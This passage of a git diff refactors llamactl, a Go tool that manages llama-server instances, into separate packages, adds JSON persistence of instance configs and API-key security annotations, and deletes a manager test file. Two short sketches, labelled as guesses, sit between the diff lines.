return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
|
||||
}
|
||||
|
||||
return inst, nil
|
||||
}
|
||||
|
||||
// GetInstance retrieves an instance by its name.
|
||||
func (im *instanceManager) GetInstance(name string) (*Instance, error) {
|
||||
func (im *instanceManager) GetInstance(name string) (*instance.Process, error) {
|
||||
im.mu.RLock()
|
||||
defer im.mu.RUnlock()
|
||||
|
||||
@@ -111,7 +89,7 @@ func (im *instanceManager) GetInstance(name string) (*Instance, error) {
|
||||
|
||||
// UpdateInstance updates the options of an existing instance and returns it.
|
||||
// If the instance is running, it will be restarted to apply the new options.
|
||||
func (im *instanceManager) UpdateInstance(name string, options *CreateInstanceOptions) (*Instance, error) {
|
||||
func (im *instanceManager) UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
|
||||
im.mu.RLock()
|
||||
instance, exists := im.instances[name]
|
||||
im.mu.RUnlock()
|
||||
@@ -124,7 +102,7 @@ func (im *instanceManager) UpdateInstance(name string, options *CreateInstanceOp
|
||||
return nil, fmt.Errorf("instance options cannot be nil")
|
||||
}
|
||||
|
||||
err := ValidateInstanceOptions(options)
|
||||
err := validation.ValidateInstanceOptions(options)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
@@ -149,6 +127,12 @@ func (im *instanceManager) UpdateInstance(name string, options *CreateInstanceOp
|
||||
}
|
||||
}
|
||||
|
||||
im.mu.Lock()
|
||||
defer im.mu.Unlock()
|
||||
if err := im.persistInstance(instance); err != nil {
|
||||
return nil, fmt.Errorf("failed to persist updated instance %s: %w", name, err)
|
||||
}
|
||||
|
||||
return instance, nil
|
||||
}
|
||||
|
||||
@@ -157,23 +141,30 @@ func (im *instanceManager) DeleteInstance(name string) error {
|
||||
im.mu.Lock()
|
||||
defer im.mu.Unlock()
|
||||
|
||||
_, exists := im.instances[name]
|
||||
instance, exists := im.instances[name]
|
||||
if !exists {
|
||||
return fmt.Errorf("instance with name %s not found", name)
|
||||
}
|
||||
|
||||
if im.instances[name].Running {
|
||||
if instance.Running {
|
||||
return fmt.Errorf("instance with name %s is still running, stop it before deleting", name)
|
||||
}
|
||||
|
||||
delete(im.ports, im.instances[name].options.Port)
|
||||
delete(im.ports, instance.GetOptions().Port)
|
||||
delete(im.instances, name)
|
||||
|
||||
// Delete the instance's config file if persistence is enabled
|
||||
instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
|
||||
if err := os.Remove(instancePath); err != nil && !os.IsNotExist(err) {
|
||||
return fmt.Errorf("failed to delete config file for instance %s: %w", instance.Name, err)
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// StartInstance starts a stopped instance and returns it.
|
||||
// If the instance is already running, it returns an error.
|
||||
func (im *instanceManager) StartInstance(name string) (*Instance, error) {
|
||||
func (im *instanceManager) StartInstance(name string) (*instance.Process, error) {
|
||||
im.mu.RLock()
|
||||
instance, exists := im.instances[name]
|
||||
im.mu.RUnlock()
|
||||
@@ -189,11 +180,18 @@ func (im *instanceManager) StartInstance(name string) (*Instance, error) {
|
||||
return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
|
||||
}
|
||||
|
||||
im.mu.Lock()
|
||||
defer im.mu.Unlock()
|
||||
err := im.persistInstance(instance)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
|
||||
}
|
||||
|
||||
return instance, nil
|
||||
}
|
||||
|
||||
// StopInstance stops a running instance and returns it.
|
||||
func (im *instanceManager) StopInstance(name string) (*Instance, error) {
|
||||
func (im *instanceManager) StopInstance(name string) (*instance.Process, error) {
|
||||
im.mu.RLock()
|
||||
instance, exists := im.instances[name]
|
||||
im.mu.RUnlock()
|
||||
@@ -209,11 +207,18 @@ func (im *instanceManager) StopInstance(name string) (*Instance, error) {
|
||||
return nil, fmt.Errorf("failed to stop instance %s: %w", name, err)
|
||||
}
|
||||
|
||||
im.mu.Lock()
|
||||
defer im.mu.Unlock()
|
||||
err := im.persistInstance(instance)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
|
||||
}
|
||||
|
||||
return instance, nil
|
||||
}
|
||||
|
||||
// RestartInstance stops and then starts an instance, returning the updated instance.
|
||||
func (im *instanceManager) RestartInstance(name string) (*Instance, error) {
|
||||
func (im *instanceManager) RestartInstance(name string) (*instance.Process, error) {
|
||||
instance, err := im.StopInstance(name)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
@@ -234,16 +239,3 @@ func (im *instanceManager) GetInstanceLogs(name string) (string, error) {
|
||||
// TODO: Implement actual log retrieval logic
|
||||
return fmt.Sprintf("Logs for instance %s", name), nil
|
||||
}
|
||||
|
||||
func (im *instanceManager) getNextAvailablePort() (int, error) {
|
||||
portRange := im.instancesConfig.PortRange
|
||||
|
||||
for port := portRange[0]; port <= portRange[1]; port++ {
|
||||
if !im.ports[port] {
|
||||
im.ports[port] = true
|
||||
return port, nil
|
||||
}
|
||||
}
|
||||
|
||||
return 0, fmt.Errorf("no available ports in the specified range")
|
||||
}
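The persistInstance method called throughout CreateInstance, UpdateInstance, StartInstance, and StopInstance is not part of this hunk. A plausible sketch of its shape, assuming "encoding/json" is imported; the actual implementation may differ:

// Sketch only: body is assumed, not taken from this diff. The <InstancesDir>/<name>.json
// path matches the one DeleteInstance removes above.
func (im *instanceManager) persistInstance(inst *instance.Process) error {
    if im.instancesConfig.InstancesDir == "" {
        return nil // persistence disabled
    }
    if err := os.MkdirAll(im.instancesConfig.InstancesDir, 0o755); err != nil {
        return err
    }
    data, err := json.MarshalIndent(inst, "", "  ")
    if err != nil {
        return err
    }
    path := filepath.Join(im.instancesConfig.InstancesDir, inst.Name+".json")
    return os.WriteFile(path, data, 0o644)
}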
|
||||
@@ -1,501 +0,0 @@
|
||||
package llamactl_test
|
||||
|
||||
import (
|
||||
"strings"
|
||||
"testing"
|
||||
|
||||
llamactl "llamactl/pkg"
|
||||
)
|
||||
|
||||
func TestNewInstanceManager(t *testing.T) {
|
||||
config := llamactl.InstancesConfig{
|
||||
PortRange: [2]int{8000, 9000},
|
||||
LogDirectory: "/tmp/test",
|
||||
MaxInstances: 5,
|
||||
LlamaExecutable: "llama-server",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
}
|
||||
|
||||
manager := llamactl.NewInstanceManager(config)
|
||||
if manager == nil {
|
||||
t.Fatal("NewInstanceManager returned nil")
|
||||
}
|
||||
|
||||
// Test initial state
|
||||
instances, err := manager.ListInstances()
|
||||
if err != nil {
|
||||
t.Fatalf("ListInstances failed: %v", err)
|
||||
}
|
||||
if len(instances) != 0 {
|
||||
t.Errorf("Expected empty instance list, got %d instances", len(instances))
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_Success(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
|
||||
instance, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
if instance.Name != "test-instance" {
|
||||
t.Errorf("Expected instance name 'test-instance', got %q", instance.Name)
|
||||
}
|
||||
if instance.Running {
|
||||
t.Error("New instance should not be running")
|
||||
}
|
||||
if instance.GetOptions().Port != 8080 {
|
||||
t.Errorf("Expected port 8080, got %d", instance.GetOptions().Port)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_DuplicateName(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
options1 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options2 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
// Create first instance
|
||||
_, err := manager.CreateInstance("test-instance", options1)
|
||||
if err != nil {
|
||||
t.Fatalf("First CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Try to create duplicate
|
||||
_, err = manager.CreateInstance("test-instance", options2)
|
||||
if err == nil {
|
||||
t.Error("Expected error for duplicate instance name")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "already exists") {
|
||||
t.Errorf("Expected duplicate name error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_MaxInstancesLimit(t *testing.T) {
|
||||
// Create manager with low max instances limit
|
||||
config := llamactl.InstancesConfig{
|
||||
PortRange: [2]int{8000, 9000},
|
||||
MaxInstances: 2, // Very low limit for testing
|
||||
}
|
||||
manager := llamactl.NewInstanceManager(config)
|
||||
|
||||
options1 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options2 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options3 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
// Create instances up to the limit
|
||||
_, err := manager.CreateInstance("instance1", options1)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||
}
|
||||
|
||||
_, err = manager.CreateInstance("instance2", options2)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 2 failed: %v", err)
|
||||
}
|
||||
|
||||
// This should fail due to max instances limit
|
||||
_, err = manager.CreateInstance("instance3", options3)
|
||||
if err == nil {
|
||||
t.Error("Expected error when exceeding max instances limit")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "maximum number of instances") && !strings.Contains(err.Error(), "limit") {
|
||||
t.Errorf("Expected max instances error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_PortAssignment(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
// Create instance without specifying port
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
instance, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Should auto-assign a port in the range
|
||||
port := instance.GetOptions().Port
|
||||
if port < 8000 || port > 9000 {
|
||||
t.Errorf("Expected port in range 8000-9000, got %d", port)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_PortConflictDetection(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
options1 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080, // Explicit port
|
||||
},
|
||||
}
|
||||
|
||||
options2 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model2.gguf",
|
||||
Port: 8080, // Same port - should conflict
|
||||
},
|
||||
}
|
||||
|
||||
// Create first instance
|
||||
_, err := manager.CreateInstance("instance1", options1)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||
}
|
||||
|
||||
// Try to create second instance with same port
|
||||
_, err = manager.CreateInstance("instance2", options2)
|
||||
if err == nil {
|
||||
t.Error("Expected error for port conflict")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "conflict") && !strings.Contains(err.Error(), "in use") {
|
||||
t.Errorf("Expected port conflict error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_MultiplePortAssignment(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
options1 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options2 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
// Create multiple instances and verify they get different ports
|
||||
instance1, err := manager.CreateInstance("instance1", options1)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||
}
|
||||
|
||||
instance2, err := manager.CreateInstance("instance2", options2)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 2 failed: %v", err)
|
||||
}
|
||||
|
||||
port1 := instance1.GetOptions().Port
|
||||
port2 := instance2.GetOptions().Port
|
||||
|
||||
if port1 == port2 {
|
||||
t.Errorf("Expected different ports, both got %d", port1)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_PortExhaustion(t *testing.T) {
|
||||
// Create manager with very small port range
|
||||
config := llamactl.InstancesConfig{
|
||||
PortRange: [2]int{8000, 8001}, // Only 2 ports available
|
||||
MaxInstances: 10, // Higher than available ports
|
||||
}
|
||||
manager := llamactl.NewInstanceManager(config)
|
||||
|
||||
options1 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options2 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options3 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
// Create instances to exhaust all ports
|
||||
_, err := manager.CreateInstance("instance1", options1)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||
}
|
||||
|
||||
_, err = manager.CreateInstance("instance2", options2)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 2 failed: %v", err)
|
||||
}
|
||||
|
||||
// This should fail due to port exhaustion
|
||||
_, err = manager.CreateInstance("instance3", options3)
|
||||
if err == nil {
|
||||
t.Error("Expected error when ports are exhausted")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "available") {
|
||||
t.Errorf("Expected port exhaustion error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestDeleteInstance_PortRelease(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
|
||||
// Create instance with specific port
|
||||
_, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Delete the instance
|
||||
err = manager.DeleteInstance("test-instance")
|
||||
if err != nil {
|
||||
t.Fatalf("DeleteInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Should be able to create new instance with same port
|
||||
_, err = manager.CreateInstance("new-instance", options)
|
||||
if err != nil {
|
||||
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestGetInstance_Success(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
// Create an instance first
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
created, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Retrieve it
|
||||
retrieved, err := manager.GetInstance("test-instance")
|
||||
if err != nil {
|
||||
t.Fatalf("GetInstance failed: %v", err)
|
||||
}
|
||||
|
||||
if retrieved.Name != created.Name {
|
||||
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
|
||||
}
|
||||
}
|
||||
|
||||
func TestGetInstance_NotFound(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
_, err := manager.GetInstance("nonexistent")
|
||||
if err == nil {
|
||||
t.Error("Expected error for nonexistent instance")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "not found") {
|
||||
t.Errorf("Expected 'not found' error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestListInstances(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
// Initially empty
|
||||
instances, err := manager.ListInstances()
|
||||
if err != nil {
|
||||
t.Fatalf("ListInstances failed: %v", err)
|
||||
}
|
||||
if len(instances) != 0 {
|
||||
t.Errorf("Expected 0 instances, got %d", len(instances))
|
||||
}
|
||||
|
||||
// Create some instances
|
||||
options1 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options2 := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
_, err = manager.CreateInstance("instance1", options1)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||
}
|
||||
|
||||
_, err = manager.CreateInstance("instance2", options2)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance 2 failed: %v", err)
|
||||
}
|
||||
|
||||
// List should return both
|
||||
instances, err = manager.ListInstances()
|
||||
if err != nil {
|
||||
t.Fatalf("ListInstances failed: %v", err)
|
||||
}
|
||||
if len(instances) != 2 {
|
||||
t.Errorf("Expected 2 instances, got %d", len(instances))
|
||||
}
|
||||
|
||||
// Check names are present
|
||||
names := make(map[string]bool)
|
||||
for _, instance := range instances {
|
||||
names[instance.Name] = true
|
||||
}
|
||||
if !names["instance1"] || !names["instance2"] {
|
||||
t.Error("Expected both instance1 and instance2 in list")
|
||||
}
|
||||
}
|
||||
|
||||
func TestDeleteInstance_Success(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
// Create an instance
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
_, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Delete it
|
||||
err = manager.DeleteInstance("test-instance")
|
||||
if err != nil {
|
||||
t.Fatalf("DeleteInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Should no longer exist
|
||||
_, err = manager.GetInstance("test-instance")
|
||||
if err == nil {
|
||||
t.Error("Instance should not exist after deletion")
|
||||
}
|
||||
}
|
||||
|
||||
func TestDeleteInstance_NotFound(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
err := manager.DeleteInstance("nonexistent")
|
||||
if err == nil {
|
||||
t.Error("Expected error for deleting nonexistent instance")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "not found") {
|
||||
t.Errorf("Expected 'not found' error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestUpdateInstance_Success(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
// Create an instance
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
_, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
// Update it
|
||||
newOptions := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/new-model.gguf",
|
||||
Port: 8081,
|
||||
},
|
||||
}
|
||||
|
||||
updated, err := manager.UpdateInstance("test-instance", newOptions)
|
||||
if err != nil {
|
||||
t.Fatalf("UpdateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
if updated.GetOptions().Model != "/path/to/new-model.gguf" {
|
||||
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().Model)
|
||||
}
|
||||
if updated.GetOptions().Port != 8081 {
|
||||
t.Errorf("Expected port 8081, got %d", updated.GetOptions().Port)
|
||||
}
|
||||
}
|
||||
|
||||
func TestUpdateInstance_NotFound(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
_, err := manager.UpdateInstance("nonexistent", options)
|
||||
if err == nil {
|
||||
t.Error("Expected error for updating nonexistent instance")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "not found") {
|
||||
t.Errorf("Expected 'not found' error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
// Helper function to create a test manager with standard config
|
||||
func createTestManager() llamactl.InstanceManager {
|
||||
config := llamactl.InstancesConfig{
|
||||
PortRange: [2]int{8000, 9000},
|
||||
LogDirectory: "/tmp/test",
|
||||
MaxInstances: 10,
|
||||
LlamaExecutable: "llama-server",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
}
|
||||
return llamactl.NewInstanceManager(config)
|
||||
}
|
||||
@@ -1,10 +1,13 @@
|
||||
package llamactl
|
||||
package server
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"io"
|
||||
"llamactl/pkg/config"
|
||||
"llamactl/pkg/instance"
|
||||
"llamactl/pkg/manager"
|
||||
"net/http"
|
||||
"os/exec"
|
||||
"strconv"
|
||||
@@ -14,14 +17,14 @@ import (
|
||||
)
|
||||
|
||||
type Handler struct {
|
||||
InstanceManager InstanceManager
|
||||
config Config
|
||||
InstanceManager manager.InstanceManager
|
||||
cfg config.AppConfig
|
||||
}
|
||||
|
||||
func NewHandler(im InstanceManager, config Config) *Handler {
|
||||
func NewHandler(im manager.InstanceManager, cfg config.AppConfig) *Handler {
|
||||
return &Handler{
|
||||
InstanceManager: im,
|
||||
config: config,
|
||||
cfg: cfg,
|
||||
}
|
||||
}
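A hypothetical sketch of wiring NewHandler from a main package; llamactl's real entrypoint and router are not in this diff, so the cfg.Instances field, the route paths, and the listen address are assumptions:

package main

import (
    "llamactl/pkg/config"
    "llamactl/pkg/manager"
    "llamactl/pkg/server"
    "net/http"
)

func main() {
    var cfg config.AppConfig // assume this was loaded elsewhere
    im := manager.NewInstanceManager(cfg.Instances) // field name is a guess
    h := server.NewHandler(im, cfg)

    mux := http.NewServeMux()
    mux.Handle("/api/v1/instances", h.ListInstances())   // path is illustrative
    mux.Handle("/v1/models", h.OpenAIListInstances())    // path is illustrative
    http.ListenAndServe(":8080", mux)
}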
|
||||
|
||||
@@ -29,6 +32,7 @@ func NewHandler(im InstanceManager, config Config) *Handler {
|
||||
// @Summary Get help for llama server
|
||||
// @Description Returns the help text for the llama server command
|
||||
// @Tags server
|
||||
// @Security ApiKeyAuth
|
||||
// @Produces text/plain
|
||||
// @Success 200 {string} string "Help text"
|
||||
// @Failure 500 {string} string "Internal Server Error"
|
||||
@@ -50,6 +54,7 @@ func (h *Handler) HelpHandler() http.HandlerFunc {
|
||||
// @Summary Get version of llama server
|
||||
// @Description Returns the version of the llama server command
|
||||
// @Tags server
|
||||
// @Security ApiKeyAuth
|
||||
// @Produces text/plain
|
||||
// @Success 200 {string} string "Version information"
|
||||
// @Failure 500 {string} string "Internal Server Error"
|
||||
@@ -71,6 +76,7 @@ func (h *Handler) VersionHandler() http.HandlerFunc {
|
||||
// @Summary List available devices for llama server
|
||||
// @Description Returns a list of available devices for the llama server
|
||||
// @Tags server
|
||||
// @Security ApiKeyAuth
|
||||
// @Produces text/plain
|
||||
// @Success 200 {string} string "List of devices"
|
||||
// @Failure 500 {string} string "Internal Server Error"
|
||||
@@ -92,6 +98,7 @@ func (h *Handler) ListDevicesHandler() http.HandlerFunc {
|
||||
// @Summary List all instances
|
||||
// @Description Returns a list of all instances managed by the server
|
||||
// @Tags instances
|
||||
// @Security ApiKeyAuth
|
||||
// @Produces json
|
||||
// @Success 200 {array} Instance "List of instances"
|
||||
// @Failure 500 {string} string "Internal Server Error"
|
||||
@@ -116,6 +123,7 @@ func (h *Handler) ListInstances() http.HandlerFunc {
|
||||
// @Summary Create and start a new instance
|
||||
// @Description Creates a new instance with the provided configuration options
|
||||
// @Tags instances
|
||||
// @Security ApiKeyAuth
|
||||
// @Accept json
|
||||
// @Produces json
|
||||
// @Param name path string true "Instance Name"
|
||||
@@ -132,13 +140,13 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
|
||||
return
|
||||
}
|
||||
|
||||
var options CreateInstanceOptions
|
||||
var options instance.CreateInstanceOptions
|
||||
if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
|
||||
http.Error(w, "Invalid request body", http.StatusBadRequest)
|
||||
return
|
||||
}
|
||||
|
||||
instance, err := h.InstanceManager.CreateInstance(name, &options)
|
||||
inst, err := h.InstanceManager.CreateInstance(name, &options)
|
||||
if err != nil {
|
||||
http.Error(w, "Failed to create instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
@@ -146,7 +154,7 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
|
||||
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
w.WriteHeader(http.StatusCreated)
|
||||
if err := json.NewEncoder(w).Encode(instance); err != nil {
|
||||
if err := json.NewEncoder(w).Encode(inst); err != nil {
|
||||
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
@@ -157,6 +165,7 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
|
||||
// @Summary Get details of a specific instance
|
||||
// @Description Returns the details of a specific instance by name
|
||||
// @Tags instances
|
||||
// @Security ApiKeyAuth
|
||||
// @Produces json
|
||||
// @Param name path string true "Instance Name"
|
||||
// @Success 200 {object} Instance "Instance details"
|
||||
@@ -171,14 +180,14 @@ func (h *Handler) GetInstance() http.HandlerFunc {
|
||||
return
|
||||
}
|
||||
|
||||
instance, err := h.InstanceManager.GetInstance(name)
|
||||
inst, err := h.InstanceManager.GetInstance(name)
|
||||
if err != nil {
|
||||
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
if err := json.NewEncoder(w).Encode(instance); err != nil {
|
||||
if err := json.NewEncoder(w).Encode(inst); err != nil {
|
||||
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
@@ -189,6 +198,7 @@ func (h *Handler) GetInstance() http.HandlerFunc {
|
||||
// @Summary Update an instance's configuration
|
||||
// @Description Updates the configuration of a specific instance by name
|
||||
// @Tags instances
|
||||
// @Security ApiKeyAuth
|
||||
// @Accept json
|
||||
// @Produces json
|
||||
// @Param name path string true "Instance Name"
|
||||
@@ -205,20 +215,20 @@ func (h *Handler) UpdateInstance() http.HandlerFunc {
|
||||
return
|
||||
}
|
||||
|
||||
var options CreateInstanceOptions
|
||||
var options instance.CreateInstanceOptions
|
||||
if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
|
||||
http.Error(w, "Invalid request body", http.StatusBadRequest)
|
||||
return
|
||||
}
|
||||
|
||||
instance, err := h.InstanceManager.UpdateInstance(name, &options)
|
||||
inst, err := h.InstanceManager.UpdateInstance(name, &options)
|
||||
if err != nil {
|
||||
http.Error(w, "Failed to update instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
if err := json.NewEncoder(w).Encode(instance); err != nil {
|
||||
if err := json.NewEncoder(w).Encode(inst); err != nil {
|
||||
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
@@ -229,6 +239,7 @@ func (h *Handler) UpdateInstance() http.HandlerFunc {
|
||||
// @Summary Start a stopped instance
|
||||
// @Description Starts a specific instance by name
|
||||
// @Tags instances
|
||||
// @Security ApiKeyAuth
|
||||
// @Produces json
|
||||
// @Param name path string true "Instance Name"
|
||||
// @Success 200 {object} Instance "Started instance details"
|
||||
@@ -243,14 +254,14 @@ func (h *Handler) StartInstance() http.HandlerFunc {
|
||||
return
|
||||
}
|
||||
|
||||
instance, err := h.InstanceManager.StartInstance(name)
|
||||
inst, err := h.InstanceManager.StartInstance(name)
|
||||
if err != nil {
|
||||
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
if err := json.NewEncoder(w).Encode(instance); err != nil {
|
||||
if err := json.NewEncoder(w).Encode(inst); err != nil {
|
||||
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
